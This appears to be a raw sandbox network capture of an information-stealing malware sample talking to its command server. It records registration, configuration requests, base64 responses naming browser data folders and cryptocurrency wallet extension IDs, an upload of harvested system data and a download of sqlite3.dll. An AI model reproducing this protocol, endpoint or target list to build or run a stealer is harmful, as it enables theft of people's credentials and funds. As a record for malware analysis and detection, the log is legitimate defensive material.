Sep 1, 2024 18:28:11.310904980 CEST	415	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD Host: 91.202.233.158 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 42 46 32 43 41 39 37 35 44 32 35 39 34 32 34 38 33 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="hwid"917BF2CA975D2594248341------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build"default------JDGHIIJKEBGIDHIDBKJD--
Sep 1, 2024 18:28:11.581547022 CEST	407	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:11 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 6d 51 31 4f 57 46 69 4d 57 4a 6a 5a 54 56 6d 5a 6d 51 33 5a 6a 4d 32 4e 57 55 31 59 7a 63 79 5a 54 63 77 5a 57 4d 30 5a 57 4d 33 4e 44 63 77 59 6d 59 31 5a 6d 46 6a 59 57 46 6c 5a 44 52 68 4d 7a 55 35 4e 32 4d 33 4d 54 6b 34 59 7a 63 31 4d 6a 42 68 59 7a 64 69 5a 6d 49 30 5a 44 51 30 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MmQ1OWFiMWJjZTVmZmQ3ZjM2NWU1YzcyZTcwZWM0ZWM3NDcwYmY1ZmFjYWFlZDRhMzU5N2M3MTk4Yzc1MjBhYzdiZmI0ZDQ0fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 1, 2024 18:28:11.582628965 CEST	469	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF Host: 91.202.233.158 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="message"browsers------BGDBAKFCFHCGDGCBAAKF--
Sep 1, 2024 18:28:11.818561077 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:11 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 1, 2024 18:28:11.818772078 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 1, 2024 18:28:11.827385902 CEST	468	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEH Host: 91.202.233.158 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 2d 2d 0d 0a Data Ascii: ------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="message"plugins------AFIIIIJKFCAAECAKFIEH--
Sep 1, 2024 18:28:12.056324959 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:11 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 1, 2024 18:28:12.056405067 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Sep 1, 2024 18:28:12.056504011 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Sep 1, 2024 18:28:12.056575060 CEST	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Sep 1, 2024 18:28:12.056585073 CEST	1236	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
Sep 1, 2024 18:28:12.056593895 CEST	672	IN	Data Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
Sep 1, 2024 18:28:12.056922913 CEST	1236	IN	Data Raw: 61 6d 74 68 63 47 5a 69 61 57 68 6b 66 44 46 38 4d 48 77 77 66 46 4e 68 5a 6d 56 51 59 57 78 38 62 47 64 74 63 47 4e 77 5a 32 78 77 62 6d 64 6b 62 32 46 73 59 6d 64 6c 62 32 78 6b 5a 57 46 71 5a 6d 4e 73 62 6d 68 68 5a 6d 46 38 4d 58 77 77 66 44 Data Ascii: amthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2xwbmdkb2FsYmdlb2xkZWFqZmNsbmhhZmF8MXwwfDB8U3ViV2FsbGV0IC0gUG9sa2Fkb3QgV2FsbGV0fG9uaG9nZmplYWNuZm9vZmtmZ3BwZGxibWxtbnBsZ2JufDF8MHwwfEZsdXZpIFdhbGxldHxtbW1qYmNmb2Zjb25rYW5uam9uZm1qamFqcGxsZGRiZ3wxfDB8MHx
Sep 1, 2024 18:28:12.056935072 CEST	268	IN	Data Raw: 64 48 78 71 61 57 6c 6b 61 57 46 68 62 47 6c 6f 62 57 31 6f 5a 47 52 71 5a 32 4a 75 59 6d 64 6b 5a 6d 5a 73 5a 57 78 76 59 33 42 68 61 33 77 78 66 44 42 38 4d 48 78 55 54 30 34 67 56 32 46 73 62 47 56 30 66 47 35 77 61 48 42 73 63 47 64 76 59 57 Data Ascii: dHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxUT04gV2FsbGV0fG5waHBscGdvYWtoaGpjaGtraG1pZ2dha2lqbmtoZm5kfDF8MHwwfE15VG9uV2FsbGV0fGZsZGZwZ2lwZm5jZ25kZm9sY2JrZGVla25iYmJuaGNjfDF8MHwwfFVuaXN3YXAgRXh0ZW5zaW9ufG5ucG1mcGxrZm9nZnBtY25ncGxobmJ
Sep 1, 2024 18:28:12.180893898 CEST	469	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAE Host: 91.202.233.158 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 2d 2d 0d 0a Data Ascii: ------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="message"fplugins------CGCFCBAKKFBFIECAEBAE--
Sep 1, 2024 18:28:12.407586098 CEST	335	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 1, 2024 18:28:12.750097036 CEST	202	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCA Host: 91.202.233.158 Content-Length: 6291 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 18:28:12.750139952 CEST	6291	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 1, 2024 18:28:13.139445066 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:12 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:13.418194056 CEST	93	OUT	GET /3836fd5700214436/sqlite3.dll HTTP/1.1 Host: 91.202.233.158 Cache-Control: no-cache
Sep 1, 2024 18:28:13.643959999 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT ETag: "10e436-5e7eeebed8d80" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Sep 1, 2024 18:28:13.643997908 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Sep 1, 2024 18:28:15.780102968 CEST	202	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKEC Host: 91.202.233.158 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 18:28:16.156399965 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 1, 2024 18:28:16.270984888 CEST	202	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA Host: 91.202.233.158 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Sep 1, 2024 18:28:16.642091036 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 01 Sep 2024 16:28:16 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
